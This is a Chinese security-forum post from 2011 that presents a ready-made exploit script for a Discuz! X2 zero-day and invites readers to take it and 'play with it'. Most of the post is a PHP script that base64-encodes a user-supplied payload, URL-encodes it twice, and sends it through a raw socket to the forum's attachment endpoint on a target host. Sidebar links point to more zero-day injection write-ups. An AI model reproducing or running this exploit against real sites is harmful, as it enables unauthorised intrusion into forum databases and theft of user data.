会员投稿
投稿指南构造Discuz! X2 0day的EXP
日期:2011-07-22
点击:242
来源: 未知
前段闹的沸沸扬扬的Discuz! X2的0day随着前几天的利用代码公布也告
一段落,其实多是鸡肋。大家多知道Discuz!密码加密变态。暴出来也
没啥用。这个是构造出来的EXP。有用的着的拿去玩玩吧。
<?php global $tmp_expstr, $id; $id=$_GET['id']; //$_GET['$tmp_expstr']; //$id=str_replace(" ","%20",$id); //$id=str_replace("=","%3D",$id); $tmp_expstr = $id; //$tmp_expstr ="'"; //$id = $tmp_expstr; function getData($host,$path,$expdata,$data){ global $host, $path, $tmp_expstr; $host = "www.xxx.com"; $expdata = "/forum/forum.php?mod=attachment&findpost=ss&aid=".urlencode(urlencode(base64_encode($tmp_expstr))); $data = "GET $expdata HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($expdata)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $expdata; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 7); return $resp; } echo getData($host,$path,$expdata,$data); ?> |
相关文章列表:
推荐内容
最新文章
- linux下nmap的使用-linux网络扫描技术
- dedecms 5.5 0day 转载
- PHP推荐禁用函数disable_functions PHP安全配置
- Aspcms 1.5 COOKIES注入0day
- (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置
- espcms最新注入0day
- emseasy最新注入漏洞
- 史上最全的各个脚本的一句话木马
- Linux 递归经典:fork 炸弹
- phpcms 2008最新0day加批量EXP代码 2011年11月
- SiteServer 3.4.4最新SQL注入0day
- ECSHOP 2.7.2最新盲注漏洞
- C语言之父丹尼斯·里奇也登船了
- 微软WP7手机系统摄像头非法跟踪用户坐标
- 黑客称德国绿坝时时监控网络用户
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史